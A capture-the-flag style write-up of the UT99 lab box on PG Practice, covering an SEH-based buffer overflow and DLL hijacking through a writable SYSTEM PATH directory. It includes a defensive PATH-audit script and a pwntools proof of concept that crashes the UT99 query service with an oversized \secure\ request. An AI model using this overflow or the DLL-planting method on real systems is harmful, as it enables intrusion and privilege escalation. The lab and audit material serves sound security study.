SEH Based Buffer Overflow & DLL Hijacking - UT99 @ PG Practice
We are solving UT99, an intermediate Windows box on PG Practice. On this box we exploit an SEH-based buffer overflow, and to make it a bit more fun we do it manually instead of just firing an exploit from Exploit-DB. For root, we place a malicious DLL in a directory on SYSTEM's PATH and reboot the box, which results in a privileged shell.
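The privilege-escalation step relies on a directory in SYSTEM's PATH being writable (or missing) so that a planted DLL is picked up at boot. The following audit script is an added example, not part of the original write-up, that finds exactly that misconfiguration: it parses a PATH value and reports entries that do not exist or that the current user can write to. The `SAMPLE_PATH` value and the `is_writable`/`exists` callables are constructed for illustration; run against the real `PATH` the checks fall back to `os.path.isdir` and `os.access`.

```python
import os

# Constructed sample PATH value in Windows format; not taken from the box.
SAMPLE_PATH = (
    r"C:\Windows\system32;C:\Windows;C:\Tools\bin;"
    r"C:\Python27;C:\Program Files\Git\cmd"
)


def parse_path(value, sep=";"):
    """Split a PATH string into unique, unquoted, non-empty entries
    while preserving search order (order matters for DLL resolution)."""
    entries = []
    for raw in value.split(sep):
        entry = raw.strip().strip('"')
        if entry and entry not in entries:
            entries.append(entry)
    return entries


def default_exists(path):
    return os.path.isdir(path)


def default_writable(path):
    return os.access(path, os.W_OK)


def audit_path(value, is_writable=default_writable, exists=default_exists, sep=";"):
    """Return (entry, issue) pairs for PATH entries an attacker could abuse.

    'missing'  - the directory does not exist; if its parent is writable it
                 can be created and will then be searched for DLLs.
    'writable' - the directory exists and the current user can drop files in it.
    """
    findings = []
    for entry in parse_path(value, sep):
        if not exists(entry):
            findings.append((entry, "missing"))
        elif is_writable(entry):
            findings.append((entry, "writable"))
    return findings


if __name__ == "__main__":
    # Audit the live PATH of the account running this script.
    live = os.environ.get("PATH", "")
    for entry, issue in audit_path(live, sep=os.pathsep):
        print(f"[{issue}] {entry}")
```

On the target this would be run from an elevated prompt so that the PATH inspected is the one SYSTEM inherits; any `writable` hit from a low-privilege context is the finding to fix (tighten the ACL or remove the entry), and any `missing` entry should be deleted from the machine PATH.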
Notes
Below is a PoC to get you started in case you want to try the overflow manually:
PoC

```python
from pwn import *

rserver = ""      # unused in this PoC; left as on the original page
lserver = ""      # host the PoC connects to; fill in before running
port = 7778       # UT99 UDP query port
size = 800        # length of the A-padding that triggers the crash

# UT99 speaks UDP, so open a UDP "connection" with pwntools
r = remote(lserver, port, typ="udp")

# Send a basic query first and log the server's reply (bytes, not str)
r.send(b"\\basic\\")
log.info(r.recv())

# Then send an oversized \secure\ query to overflow the buffer
buffer = b""
buffer += b"\\secure\\"
buffer += b"A" * size
r.send(buffer)
r.close()
```
This post is licensed under CC BY 4.0 by the author.